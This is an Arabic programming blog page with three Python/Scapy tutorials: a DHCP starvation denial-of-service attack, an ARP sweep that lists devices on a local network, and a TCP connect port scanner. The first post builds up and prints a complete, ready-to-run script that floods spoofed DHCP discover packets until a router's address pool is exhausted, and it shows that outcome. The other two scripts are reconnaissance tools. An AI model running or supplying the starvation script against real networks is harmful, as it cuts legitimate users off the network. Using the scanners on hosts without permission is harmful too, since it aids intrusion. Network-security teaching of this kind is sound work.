‏إظهار الرسائل ذات التسميات البرمجة. إظهار كافة الرسائل
‏إظهار الرسائل ذات التسميات البرمجة. إظهار كافة الرسائل

الاثنين، 11 أكتوبر 2021

بايثون للشبكات : تعطيل برتوكول DHCP بواسطة Scapy

بسم الله الرحمن الرحيم

 برتوكول Dynamic Host Control Protocol أو اختصارا DHCP تتلخص مهمته الأساسية في توفير عناوين الأنترنت (IP Address) بشكل ألي للأجهزة المتصلة بالشبكة , البرتوكول مفيد جدا و مستخدم بشكل كبير في الشبكات المنزلية .

في هذه التدوينة سوف نعرض شرح بسيط لخوازمية البرتوكول و تطبيق عملي لهجوم حجب الخدمة أو DDOS و الذي يعرف بهجوم DHCP starvation بواسطة مكتبة scapy.

قبل ان نبدأ لتثبيت المكتبة في ويندوز و لينكس اتبع الخطوات في هذا التدوينة .

 

  • برتوكول DHCP 

    برتوكول DHCP برتوكول يقع في طبقة التطبيقات في تمثيل OSI الخاص بالشبكات 
     
    يستخدم البرتوكول UDP على المنفذ 67 لرسائل الخادم (Server) و المنفذ  68 لرسائل العميل (Client) .

    تتلخص عملية الاتصال بالخطوات التالية :
     
    مصدر الصورة :https://en.wikipedia.org
     
    1. يقوم العميل بأرسال حزمة انترنت (Internet Packet) تحمل العنوان الخاص بالمرسل هو عنوان الأنترنت 0.0.0.0 و عنوان المستقبل 255.255.255.255 هذا العنوان يعني أنه سوف يتم ارسال هذه الحزمة للجميع , اما عن اطار الأيثرنت الذي يحتوي على هذه الحزمة فالعنوان الفيزيائي للمرسل هو الخاص ببطاقة الشبكة و العنوان المرسل إليه يكون العنوان الخاص ff:ff:ff:ff:ff:ff الذي يعني أن هذا الأطار سيتم بثه إلى جميع الأجهزة في الشبكة , في حالة عدم وجود استجابة لهذه الرسالة سيتم تجديد ارسالها على الشبكة إلى أن يحصل رد .
    2. عند وصول الطلب إلى الخادم يرد برسالة تعرض عنوان الانترنت المقترح .
    3. يرد العميل باستخدام رسالة طلب عنوان ( Request ) تحتوي على العنوان الذي تم اختياره و عنوان الخادم , يستطيع العميل استقبال رسائل من اكثر من خادم لكن يجب ان يرد على خادم واحد فقط , لذا يحتوي على معرف الخادم و عنوان الانترنت الخاص به , لأنه في هذه المرحلة لن يكون للعميل عنوان انترنت فسيتم بث هذه الرسالة للكل على نفس العنوان كما في الخطوة الأولى .
    4. المرحلة الأخيرة يرسل الخادم رسالة تبين وقت صلاحية العنوان قبل أن يحتاج الجهاز لطلب عنوان مرة أخرى و هذا الوقت يعتمد على اعدادات الخادم كما يتم توفير اي معلومات اضافية طلبها العميل في مرحلة الأكتشاف مثل عنوانين خوادم WINE و DNS و NTP و عنوان Gateway .


  • مزايا و العيوب في برتوكول DHCP

    برتوكول DHCP مفيد جدا و مستخدم بشكل كبير , تخيل فقط كمية الجهد للإعداد كل جهاز في شبكة تتغير فيها الأجهزة بشكل دائم أو تخيل تكليف شخص غير متخصص بوضع هذه الإعدادت احتمال حصول خطأ كبير جدا , لكن هناك عيب كبير في هذا البرتوكول و هو عدم وجود أي الية لتحكم في وصول المستخدم فأي طلب للحصول على عنوان سوف يتم تنفيذه من دون التحقق من صحة و مصداقية الطلب , ماذا لو قام شخص بتوليد طلبات للحصول على جميع العنوانين في الشبكة و حجزها بشكل دائما , لن يجد أي جهاز حقيقي يحاول الأتصال أي عنوان مما يؤدي لعدم قدرته على الاتصال و هذا ما سوف نستخدمه في هذه التدونية , بكل بساطة سوف نستخدم بايثون لتوليد عدد كبير من الطلبات المزيفة .




    • الأدوات

سوف نستخدم في برمجتنا لهذا السكريبت مكتبة  Scapy التي تعمل على لغة بايثون لكي تتعرف على طريقة التثبيت قم بالدخول على هذه التدوينة .

هناك ايضا شرح لموجه الأوامر الخاص بالمكتبة Scapy الذي سنتخدمه ايضا لشرح الكيفية التي سيعمل بها البرنامج


  • خطوة بخطوة

    من موجه التفاعلي للمكتبة Scapy بنبدأ في الطبقة الأولى من الأطار (frame) و هو أطار Ethernet :
     
    pkt = Ether(src=RandMAC(),dst="ff:ff:ff:ff:ff:ff")
    
     
    الأطار بسيط فقط حددنا العنوان المرسل له وهو ff:ff:ff:ff:ff:ff و هو العنوان الخاص بعملية Broadcast في برتوكول Ethernet أما العنوان الخاص بالمرسل فاستخدمنا الدالة RandMAC تولد هذه الدالة عنوان فيزيائي عشوائي , نحتاج هنا لإرسال العديد من الطلبات بعنوان غير حقيقة و هنا هذه الدالة ستقوم بالعمل و الأن إلى الطبقة الثانية .
     
    pkt = pkt / IP(src="0.0.0.0",dst="255.255.255.255")
    
     
     الطبقة الثانية هي برتوكول IP سوف نحدد فقط العنوان المرسل كعنوان المرسل سيكون العنوان الخاص 0.0.0.0 , هذا العنوان يستخدم لدلالة على عدم وجود عنوان ففي هذه المرحلة لا يملك الجهاز عنوان انترنت , اما العنوان الخاص بالمرسل إليه 255.255.255.255 فهو عنوان خاص بعملية الارسال لجميع الأجهزة أو broadcast .

    pkt = pkt / UDP(sport=68,dport=67)
    
     
     و الأن إلى انشاء حزمة برتوكول UDP  و تحديد المنفذ المحلي برقم 68 و المنفذ الهدف بالرقم 67 , فقط هذا ما نحتاج له .

    pkt = pkt / BOOTP(op=1,chaddr=RandMAC())
    
     
     هنا سنضيف طبقة خاصة ببرتوكول BOOTP , هذا البرتوكول اقدم من برتوكول DHCP و يقول بنفس العمل , لكن كان يستخدم لعملية اعطاء الأجهزة عديمة الأقراص عنوان انترنت و تحميل النظام من الشبكة و هو يعمل على نفس المنافذ الذي يستخدمها برتوكول DHCP لذا لا يمكن ان يعملا على نفس الجهاز , المتغير op يحتمل قيمتين فقط 1 و 2 القيمة 1 ترمز لـ BOOTREQUEST اي طلب برتوكول BOOTP و القيمة 2 ترمز لــ
    BOOTREPLY  اي رد على طلب خاص بهذا البرتوكول , أما المتغير chaddr فهو اختصار لـ Client Hardware Address أي العنوان الفيزيائي للعميل و هنا استخدمنا ايضا الدالة RandMAC لتوليد عنوانين عشوائية .
     

    pkt = pkt / DHCP(options=[('message-type','discover'),('end')])
    
     
     
    المعلومات التي ترسل المطلوبة و التي يوفرها الخادم كلهما يرسل عن طريق رقم يدل على الأختيار Options , لكن scapy تستخدم قيمة نصية تدل على نوع الأختيار ثم قيمته و يتم وضعها في tuple كمثالنا ('message-type','discover') أما التمثيل في الحزمة فيكون قيمة رقمية ثم طول القيمة بالبايت ثم القيمة , و في نهاية الحزمة يجب وضع end و التي هي عبارة عن القيمة ff أو بالتمثيل العشري 255 .

    'طبعا scapy يقوم بالاهتمام بالكثير من التفاصيل بدل ترك المستخدم يهتم بكل شيء و لكي تعرض الحزمة التي قمنا بأنشاءها استخدم الدالة show2 كالتالي :


     
    ###[ Ethernet ]### 
      dst= ff:ff:ff:ff:ff:ff
      src= 61:bf:93:29:c6:e5
      type= IPv4
    ###[ IP ]### 
         version= 4
         ihl= 5
         tos= 0x0
         len= 272
         id= 1
         flags= 
         frag= 0
         ttl= 64
         proto= udp
         chksum= 0x79dd
         src= 0.0.0.0
         dst= 255.255.255.255
         \options\
    ###[ UDP ]### 
            sport= bootpc
            dport= bootps
            len= 252
            chksum= 0xea44
    ###[ BOOTP ]### 
               op= BOOTREQUEST
               htype= 1
               hlen= 6
               hops= 0
               xid= 0
               secs= 0
               flags= 
               ciaddr= 0.0.0.0
               yiaddr= 0.0.0.0
               siaddr= 0.0.0.0
               giaddr= 0.0.0.0
               chaddr= b'e5:a4:e8:d9:77:e'
               sname= b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
               file= b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
               options= 'c\x82Sc'
    ###[ DHCP options ]### 
                  options= [message-type=discover end]
    
     
 
و الأن قبل أن نبدأ بالارسال هنالك مشكلة scapy دائما يتأكد من عنوان المرسل إليه عند وصول الرد و في الرسالة التي نرسلها سيكون العنوان 255.255.255.255 و لكن الرد سيحمل عنوان الخادم الخاص ببرتوكول DHCP لذا يجب ان نعطل هذه الخاصية باستخدام هذا السطر :
 
conf.checkIPaddr = False
 
 
 و الأن إلى السطر الأخير و هو سطر الأرسال :
 
sendp(pkt,loop=1)
 
 في حالة عدم تحديد المنفذ او ما يسمى بــ" interface " سيتم الأرسال على المنفذ الافتراضي الذي تستطيع معرفته بواسطة :
 
conf.iface
 
و لتحديد المنفذ في امر الأرسال استخدم المتغير iface في امر الأرسال كالتالي :
 
sendp(pkt,iface="eth0",loop=1)
 
 و هذا هو نتيجة تنفيذ البرنامج على رواتر سيسكو عند تنفيذ الأمر الخاص بعرض العنوانين المحجوزة في خادم DHCP :

show ip dhcp binding



تلاحظ بأن العنوانين جميعها محجوزة لذا أذا حاول أي جهاز حقيقي طلب عنوان من خادم DHCP لين يقدم له الخادم عنوان لعدم توافره لكن يأتي السؤال هنا لماذا يتم حجز هذه العناوين برغم أنه لن تتكمل عملية المصادقة فقط قمنا بأرسال طلب عنوان فقط , ببساطة يقوم الخادم بحجز العنوان مباشرة لأنه يقوم بأرسال العنوان في رسالة DHCP Offering بحسب تصميم البرتوكول , لذا في حالة وقف الهجوم سوف يتم تحرير العنوانين في وقت قصير لعدم اكتمال عملية حجز العنوان .

  • السكريبت المكتمل 


     

    * تم وضع صورة للنص البرمجي بسبب وجود مشكلة في النص حيث أن العلامة \ تظهر في اول السطر بدل أن تكون في أخر كل سطر .
#!/usr/bin/python3
from scapy.all import conf,Ether,IP,RandMAC,UDP,BOOTP,DHCP,sendp

conf.checkIPaddr = False


dhcp_discover = Ether(dst="ff:ff:ff:ff:ff:ff",src=RandMAC()) \
/IP(src="0.0.0.0",dst="255.255.255.255") \
/UDP(sport=68,dport=67) \
/BOOTP(op=1,chaddr=RandMAC()) \
/DHCP(options=[('message-type','discover'),('end')])

#غير الواجهة بحسب جهازك
sendp(dhcp_discover,iface="eth0",loop=1,verbose=1)
 
 
 
  • المصادر 


    لقد أعتمدت في كتابة هذا الموضوع على هذا الفيديو و انصح بمشاهدته و متابعة هذا القناة:


 و النهاية  ان شاء الله يكون الشرح بسيط و مفيد و إذا في خطأ او أضافة أو سؤال تقد تتواصل معي على المدونة مباشرة بالتعليقات .

 
 

الاثنين، 20 سبتمبر 2021

بايثون للشبكات : برنامج يستخدم برتوكول ARP لعرض جميع الأجهزة المتصلة على الشبكة المحلية

 بسم الله الرحمن الرحيم

الحصول على عنوان الأنترنت الخاص بالإجهزة على الشبكة هو الخطوة الأولى لكي تبدأ عملية اكتشاف نقاط الضعف في هذه الأجهزة , و في هذه التدوينة سوف نبني برنامج بايثون يقوم بهذه المهمة , و هنا يأتي السؤال لماذا ؟ , ألا يوجد برامج تقوم بهذا العمل و تغني عن هذا المجهود , الأجابة نعم  لكن افضل طريقة للتعلم هو التطبيق, سنبدأ أولا بشرح نظري للطريقة التي سنستخدمها مع نظرة لبرتوكول ARP , ثم تثبيت مكتبة Scapy في ويندوز و لينكس و أخيرا سوف نقوم بكتابة سكريبت يقوم باستخدام بروتوكول ARP لكشف الأجهزة المتصلة .


  • نظرة لبرتوكول ARP :

Address Resolution Protocol أو أختصاراً (ARP) , هو برتوكول يهدف لعرض العنوانين الفزيائية أو ما يسمى بعنوان MAC المرتبط بعنوان الأنترنت ( IP Address ) و العكس صحيح .

لنفترض بأنك تريد الاتصال بكمبيوتر يوجد على الشبكة المحلية و لديك عنوان الأنترنت (IP) فتحصل الخطوات التالية :
  1. سيبحث جهازك عن العنوان الفزيائي في جدول العناوين الموجود على النظام  والمسمى ARP Caching Table .
  2. في حالة وجود هذا العنوان في الجدول سوف يتم الأعتماد عليه بدون ارسال طلب ARP .
  3. في حالة عدم وجود العنوان سوف يرسل الجهاز طلب ARP Request لجميع الأجهزة المتصلة (Broadcast message).
  4. جهاز الــ"switch" سيقوم بأرسال هذه الرسالة لجميع المنافذ النشطة ما عدا المنفذ الذي تم منه الأرسال .
  5. عند وصول الرسالة إلى الجهاز الذي يحمل عنوان الأنترنت المطابق سوف يرد برسالة تحمل عنوانه الفيزيائي .
  6. في حالة عدم وجود جهاز يحمل عنوان الأنترنت على الشبكة المحلية سوف ينتهي وقت انتظار الرد و يفترض الجهاز المرسل بأنه لا وجود لهذا الجهاز .

هذه صورة لطلب ARP Request من برنامج wireshark , تلاحظ بساطة البروتوكول :


 الرد في برتوكول يكون العنوان البديل لعنوان البث (Broadcast ) و سوف تكون الرسالة موجهة بشكل  مباشر للمرسل (Unicast) ونوع الرسالة Opcode هو Reply .


هذا شرح مبسط جدا لهذا البرتوكول , و السبب لوجوده بأن الرسائل داخل الشبكة المحلية يتم تبدلها بواسطة برتوكول Ethernet  الذي يعمل في طبقة ربط البيانات (Data Link) والذي يستخدم العنوان الفيزيائي للاتصال  , كما يظهر لك نموذج OSI .


هنا قد تتساءل لماذا لا نستخدم برتوكول ICMP و اشهر تطبيقاته و هو الأمر Ping في انظمة ويندوز و لينكس , السبب هو أن الكثير من الأجهزة مثل الهواتف الذكية و جدران النار تحظر هذا البرتوكول و تقوم بمنع الرد على رسائله, أما في حالة برتوكول ARP فمن الصعب تعطيله لأنه اساسي لعملية الأتصال كما رأيت .


  • تثبيت مكتبة Scapy 

مكتبة Scapy هي مكتبة متخصصة في بناء و ارسال حزم شبكات معدلة و ارسالها عبر الشبكة , امكانيات هذه المكتبة كبيرة جداٌ و تعطي المبرمج امكانيات رائعة .

التثبيت في نظام لينكس :

لمستخدمي توزيعة Ubuntu أو اي توزيعة تستخدم مدير الحزم Apt فقط اكتب الأمر في موجه الأوامر :

sudo apt-get install scapy


التثبيت في نظام ويندوز :

لتثبيت في ويندوز سوف نستخدم توزيعة البايثون Anaconda , هذه التوزيعة من الأشهر في مجال علم البيانات ( Data sciences ) و ما يميزها هو سهولة تثبيت المكتبات و وجود محرر ممتاز لذا سوف نستخدمها في حالتنا .

  1. قم بتنزيل التوزيعة من الموقع الرسمي ( https://www.anaconda.com/products/individual-d ) .
     
    2. اتبع خطوات التثبيت 
     



    3. تأكد من تفعيل خيار أضافة مجلد التثبيت إلى متغير مسار البرامج ( PATH )


 4. بعد أنتهاء التثبيت قم بتشغيل برنامج Anconda من القائمة Start 




5. عندما ينتهي تحميل البرنامج ستظر لم نافذة كالتالي :



6. أختر من القائمة على اليمين Enviroments :





7. و لتحديث قائمة المكتبات أضغط "Update Index" و غير العرض إلى جميع المكتبات ثم أبحث عن المكتبة scapy و اضغط في اسفل المكتبة على الخيار Apply :

 
للتأكد من نجاح التثبيت قم بتشغيل موجه الأوامر الخاص بالمكتبة Scapy في نظام ويندوز من القائمة Start أكتب في مربع البحث أكتب "Cmd" و أختر "Run as Administrator" :
 

 اكتب في موجه الأوامر Scapy أذا ظهر لك موجه الأوامر كالتالي فيعني أننا نجحنا في التثبيت :


في نظام ليكنس فقط أكتب الأمر كالتالي , يجب أن يظهر لك موجه الأوامر مشابه لما في ويندوز :

sudo scapy


  • الموجه التفاعلي لمكتبة Scapy

    قبل أن نكتب السكريبت في بايثون سوف نستغل خاصية الموجه الأوامر في Scapy و الذي هو عبارة عن موجه python مع تفعيل المكتبة Scapy.
     
    هذه الخاصية اعتبرها من الأمكانيات الممتازة حيث يمكن تجريب و التعديل بشكل مباشر و سريع لكي تتأكد من نجاح برنامجك.

    لنبدأ أولا بأنشاء الاساس في أطار الشبكة الخاصة ببرتوكول ARP , البرتوكول مبنى و مضمن في أطار ايثرنت (Ethernet Frame) .
    * يجب أن أنوه بأن برتوكول ARP مستخدم في أكثر من أطار للشبكات , ولكن للشبكات المحلية الأطار المستخدم هو ايثرنت .
     
    و لكن قبل أن ننشىء هنا عرض مبسط لمكونات الإطار و شرح لها :

    المصدر :https://commons.wikimedia.org/wiki/File:Ethernet_II_Frame_Structure.png


    هذه الصورة لإطار ايثرنت ( اقصد بالإطار Frame و هي الكلمة المستخدمة للحزم في الطبقة الثانية من OSI للشبكات ) و الشرح ببساطة :

    1. Preamble : هو مجموعة 56 بايت تستخدم لمزامنة ساعة المستقبل على نفس ساعة المرسل ( Clock Sync )  و هنا لا نعني التوقيت كالوقت و التاريخ , هذا المصطلح يخص الإلكترونيات , و هذا النطاق يخص الطبقة الأولى من من OSI وسوف اتجنب شرحها لكي لا أعقد الموضوع .
    2. SFD : اختصار لــ  Start Frame Delimiter بداية البيانات الخاص بالإطار أيضا يقع في الطبقة الأولى من OSI .
    3. Destination Address : العنوان الفيزيائي للبطاقة الشبكة (Mac Address ) المرسل لها البيانات يتكون من 6 بايتات يتم عرضه بتمثيل Hexadecimal و فصل بين كل بايت بـ ":" .
    4.  Source Address : العنوان الفيزيائي للبطاقة الشبكة (Mac Address ) المرسل منها البيانات يتكون من 6 بايتات ايضا و يتبع نفس التمثيل كما في العنوان المرسل له .
    5. النوع : بحسب البرتوكول المستخدم في حالتنا سيكون ARP و سيحمل القيمة 0x0806.
    6.  البيانات : البيانات الفعلية
    7. FCS : هذه القيمة تمثل ناتج معادلة تأكد للمرسل أذا حدث خطأ في نقل البيانات , حيث يتم تنفيذ نفس المعادلة في المرسل و المستقبل و في حالة أختلاف القيمة في المرسل يتم أفتراض حصول خطأ .


    في Scapy يمكن الوصول إلى العنوان المرسل و المستقبل و البيانات و النوع , و FCS متروكين للنظام أما Preamble و SFD فهما متروكين لبطاقة الشبكة .
     
    لإنشاء أطار Ethernet في Scapy فقط استخدم الأمر التالي الذي سوف ينشأ أطار Ethernet و يسنده إلى المتغير الخاص بنا:
myFrame = Ether()

لعرض مجتويات هذا الأطار فقط أستخدم الدالة show كالتالي :

myFrame.show()

سيعرض لك القيم التي تستطيع تغيرها في الإطار كالتالي :
###[ Ethernet ]###
dst= ff:ff:ff:ff:ff:ff
src= 11:36:12:54:14:49
type= 0x9000


العنوان الذي في خانة dst و الخاص بإطار Ethernet هو عنوان broadcast و معناه أرسال هذه الرسالة لجميع المنافذ ما عدا المنفذ المرسل , في نظام ويندوز لن يكون هذا العنوان للمرسل , للتغيير فقط قم بدخل للمتغير dst في كائن (Object) الإيثرنت الذي إنشائنا :


myFrame.dst = "ff:ff:ff:ff:ff:ff"

أما عنوان المرسل فالمكتبة تستخدم عنوانك الفيزيائي للبطاقة المستخدمة , في حالة برنامجنا فهذا هو المطلوب .

و الأن قد تتساءل لماذا لم نغير نوع الاطار (Frame) لنوع أطار برتوكول ARP , لكي تعرف السبب سوف نضيف طبق برتوكول ARP للإطار الذي تم إنشائه :

myFrame = myFrame / ARP()

الأن قم بعرض الإطار بأستخدام الدالة show و لاحظ التغير :

>>> myFrame.show()
###[ Ethernet ]###
dst= ff:ff:ff:ff:ff:ff
src=
11:36:12:54:14:49 
  type= ARP
###[ ARP ]###
hwtype= 0x1
ptype= IPv4
hwlen= None
plen= None
op= who-has
hwsrc=
11:36:12:54:14:49 
     psrc= 192.168.1.148
hwdst= 00:00:00:00:00:00
pdst= 0.0.0.0

>>


هل لاحظت نوع إطار الإيثرنت , لقد تغير إلى ARP , بدون أي داعي من قبلك لتغيير أي شيء , كما أن طريقة العرض و الأضافة كطبقات تسهل عملية الأضافة و البرمجة .
نوع ARP هنا تجده في القيمة op هو who-has هو طلب استفسار عن العنوان الفيزيائي لعنوان أنترنت و هو المطلوب لبرنامجنا لذا لن نغير أي شيء , العنوان الفيزيائي للجهة المرسل إليها في الطبقة الخاصة ببرتوكول ARP هي 00:00:00:00:00:00 و هو ايضا عنوان خاص بالإرسال إلى الكل (broadcast) .

نحتاج فقط لوضع عنوان الأنترنت الذي نريد التأكد من وجوده في الشبكة المحلية , نستطيع أن نكتب عنوان واحد كالتالي :

myFrame.pdst = "192.168.1.114"

و لكن تذكر نريد أن نعرض جميع الأجهزة المتصلة , قد تقترح أن تقوم بعمل حلقة تكرارية (Loop) كالتالي :

for i in range(1,254):
    myFrame.pdst = "192.168.1." + str(i) 
    #الإرسال هنا و الاستقبال - سنضيف ذلك  
 
 هذا حل جيد و لكن هنالك طريقة أفضل فمكتبة Scapy توفر أمكانية استخدام المدى لعنوانين الأنترنت فنكتب كالتالي :


myFrame.pdst = "192.168.1.0/24"

 و الأن إلى الأرسال و عرض النتائج باستخدام الدالة srp التي تقوم لنا بعملية الأرسال و الأستقبال حرف p في نهاية اسم الدالة يدل على أنها ترسل و تستقبل في الطبقة الثانية ( Data Link ) من نموذج OSI , هذه الدالة ترجع Tuple يحتوي على الطلبات التي تم الأستجابة لها و التي تم رفضها , لكي تقوم بتجاهل الطلبات التي تم تجاهلها فقط أستبدل اسم المتغيرunanswered بـ _ :

answered , unanswered = srp(myFrame,timeout2)

وهنا الأمر بعد التعديل لتجاهل الطلبات التي لم يتم الرد عليها :
 


answered , _ = srp(myFrame,timeout2)
 
 لعرض النتائج تستطيع استخدام الدالة summary الموجودة في المكتبة كالتالي :

answered.summary()

لتقليل البيانات المعروضة استخدم هذا الحلقة التكرارية , سوف نقوم بدوران في القائمة التي لدينا و التي تحتوي على tuple يحتوي على البيانات المرسلة و المستقبلة   و سوف نقوم بتجاهل ما تم ارسالها و عرض فقط الردود :

for _ , recv in answered :
    print(recv.summary())
 

 
هذا الخطوات هي ببساطة ما سوف يقوم به السكريبت , الأن سوف نضع هذه الأوامر في سكريبت .
 
 
  • السكريبت النهائي :

 
#!/usr/bin/env python
import sys
from scapy.all import srp,Ether,ARP,conf

#الحصول على مدى عنوانين الشبكة او في حالة وجود عنوان واحد

if len(sys.argv) != 2:
    print("Usage:arping.py <Net or IP> Ex. 192.168.1.0/24 or 192.168.1.10")
    exit(1)
#ايقاف  عرض البيانات الأضافية الخاصة بعملية الأرسال 
conf.verb = 0

target = sys.argv[1]
pkt = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=target)

#في حالة وجود خطأ في عنوان الأنترنت أو المدى
try:
    answerd, _ = srp(pkt,timeout=4)
except Exception as e:
    print("Error: " + e.__class__, " occurred.")
    exit(2)



for _ , recv in answerd :
    #عرض فقط عنوان الانترنت الخاص بالمرسل
    #أذا اردت معلومات أكثر استخدم summary 
    print("IP:" + recv.psrc) 
 
 
 
 
 لتشغيل السكريبت في ويندوز , افنح موجه أوامر خاص بمدير النظام ثم أكتب python متبوعا بمسار الملف الذي حفظته :

python C:\Users\abgoor\Desktop\arping.py 192.168.1.0/24

 أما في نظام لينكس فيجب أن تحول الملف لملف تنفيذي باستخدام الأمر chmod ثم لتنفيذ الأمر استخدم النقطة "." ثم مسار الملف :
 
 
chmod +x /home/abgoor/script/arping.py

. /home/abgoor/script/arping.py 192.168.1.0/24
 
 
  • الخاتمة

    احساس الإنجاز شعور جميل , رغم بساطة برنامجنا إلا أنه يعمل و بشكل جيد , طبعا أريد منك أنك تحاول تطور البرنامج و في الأخير هذا لن يكون الموضوع الأخير عن مكتبة Scapy , هذه المكتبة تعطيك اختيارات غير محدودة في برمجة الشبكات, و أن شاء الله سوف نحاول نغطي هذه الإمكانيات في أكثر من موضوع .
    أذا اعجبك الموضوع طلب بسيط دعوة طيبة منك تكفي :-) .
     

الأحد، 12 سبتمبر 2021

برمجة سكريبت بالبايثون يعرض المنافذ المتاحة ببرتوكول TCP

   بسم الله الرحمن الرحيم

في هذا الشرح البسيط ستتعلم كيف تبرمج برنامج بسيط بالبايثون يظهر لك المنافذ المفتوحة على اي جهاز مشبوك على الشبكة الخاصة ببرتوكول TCP , لكن قبل ان ابدأ يجب ان انبه ان هذا البرنامج للأغراض التعليمية و يجب الا تستخدمه الا على انظمة يحق لك الوصول له .

 

  •  كيف يعمل البرنامج ؟
البرنامج يستخدم عملية handshake في برتوكول TCP في حالة اتمام الاتصال يقوم البرنامج بأنذار المستخدم برقم المنفذ (Port).
 
هذه الصورة تبين عملية اتصال ناجحة لبرتوكول TCP
مصدر الصورة :https://commons.wikimedia.org/wiki/File:Tcp_normal_2.png
 
1. يرسل الجهاز للسيرفر رسالة TCP -SYN 
2. في حالة توافر المنفذ يرد السيرفر برسالة SYN-ACK
3. لتأكيد الاتصال يرسل الجهاز للسيرفر رسالة ACK لتأكيد الاتصال 

طبعا هذا الشرح مبسط جدا  , لغاية عدم تعقيد الموضوع , يمكن في المستقبل اخصص موضوع خاص ببرتوكول TCP .

في حالة عدم نجاح عملية الاتصال سوف يتم اعتبار المنفذ مغلق , و الأن لشرح بسيط لبرمجة الشبكات في البايثون قبل ان نبدأ , بشكل عام جميع لغات البرمجة تتشابه في الخطوات التالية :


 طبعا لمثالنا سوف يكون برنامجنا هو Client لكن من دون ارسال اي بيانات فقط سيحاول الاتصال و سيقوم بعرض النتيجة للاتصال ثم اغلاق الاتصال .

و الأن للنص البرمجي الكامل لمثالنا :

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#!/usr/bin/python3
import sys
import socket

if len(sys.argv) == 2:
    print("Start Scanning : {}".format(sys.argv[1]))
    target = sys.argv[1]
else:
    print(("Usage:{} target".format(sys.argv[0])))
    exit(2)
    
    
try:
    for port in range(1,65535):
        sos = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        result = sos.connect_ex((target,port))
        if result == 0 :
            print ( "{} is Open".format(port))
        sos.close()
        
except KeyboardInterrupt:
    print("\nExiting the program")
    exit(0)
except socket.gaierror:
    print("Host couldn't be reslove")
    exit(1)
except socket.error:
    print("Couldn't connect to {}".format(target))
    exit(2)


بندأ بشرح برنامجنا بالتفصيل , أولا نبدأ في السطرين الأولين  :

1
2
import socket 
import sys   
 
المكتبة البرمجة socket بنستخدمها لعملية الاتصال , هذه المكتبة تستخدم لجميع عمليات الشبكات الاساسية , و مكتبة sys التي بنحتاجها لمعالجة المعطيات من سطر الاوامر .


و الان الى السطر الذي يعالج معطيات سطر الأوامر :


1
2
3
4
5
6
if len(sys.argv) == 2: #اذا طول معطيات سطر الاوامر يساوي 2 
    print("Start Scanning : {}".format(sys.argv[1])) #اطبع اسم الهدف 
    target = sys.argv[1] #احفظ اسم الهدف في المتغير target
else:
    print(("Usage:{} target".format(sys.argv[0]))) #في حال عدم تطابق الشرط اطبع رسالة الاستخدام و اخرج من البرنامج
    exit(2)

هذا مثال على استخدام برنامجنا , في بايثون يكون معاملات البرنامج (program parameters)  تبدأ دائما باسم ملف البرنامج , و يتم تخزين المعاملات في مصفوفة (array) يمكن الوصول لها باستخدام sys.argv

kh@DESKTOP-3444:~$ ./myscript target
 
و الأن إلى الجزء الذي يقوم بالعمل الفعلي :

1
2
3
4
5
6
7
for port in range(1,65535): # المدى يمثل جميع منافذ برتوكول TCP
        sos = socket.socket(socket.AF_INET,socket.SOCK_STREAM) #انشاء مقبس الشبكة
        result = sos.connect_ex((target,port)) # محاولة الاتصال 
        if result == 0 : #اذا كانت نتيجة الاتصال صفر فالاتصال ناجح
            print ( "{} is Open".format(port)) #طباعة رسالة للمستخدم
        sos.close() #اغلاق الاتصال

قمت بوضع هذه الأوامر في كتلة Try-Except للتعامل مع الإستثاءات التي قد تواجه التنفيذ , والأن لشرح هذه الاسطر بتفصيل اكثر:


1
sos = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

هذا السطر الذي ينشيء المقبس (socket) , و يخبر النظام لحجز الموارد كما يحدد نوع نظام العناوين و نوع الاتصال :
 
  • AF_INET : نظام عناوين الانترنت النسخة الرابعة Internet protocol version 4 أو اختصارا IPv4 , هو النظام الحالي المستخدم لعنونة الاجهزة على شبكة الانترنت
  • SOCK_STREAM : استخدام برتوكول TCP كنوع البرتوكول المستخدم لتوصيل البيانات .
للعلم يمكنك كتابة امر تحديد المقبس (socket) من دون تحديد نظام العناوين و نوع الاتصال حيث انه القيم الافتراضية .
 
1
sos = socket.socket()

و الأن بعد انشاء الاتصال سنحاول اجراء الاتصال باستخدام connect_ex , في حالة نجاح الاتصال سنحصل على القيمة صفر , و في هذه الحالة فقط سيتم طباعة رقم المنفذ :

1
2
3
result = sos.connect_ex((target,port))  
        if result == 0 : 
            print ( "{} is Open".format(port)) 

و في الاخير سنقوم بأغلاق المنفذ :

1
sos.close()

و للتعامل مع جميع الاستثناءات (exceptions) قمنا باستخدام try..except :
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
try:



except KeyboardInterrupt:
    print("\nExiting the program")
    exit(0)
except socket.gaierror:
    print("Host couldn't be reslove")
    exit(1)
except socket.error:
    print("Couldn't connect to {}".format(target))
    exit(2)

و هذا شرح للاستثناءات :
  • KeyboardInterrupt : في حالة ضغط المستخدم Ctrl+C سيتم اغلاق البرنامج
  • socket.gaierror :  في حالة فشل البرنامج بتحويل النطاق (Domain) إلى عنوان رقمي IP
  • socket.error : في حالة فشل انشاء مقبس (socket) 

هذا شرح مبسط لهذا البرنامج البسيط , لكن هل هذا البرنامج يعمل , اذا اردت تجربة البرنامج تستطيع استخدام جهازك مباشرة باستخدام العنوان localhost .
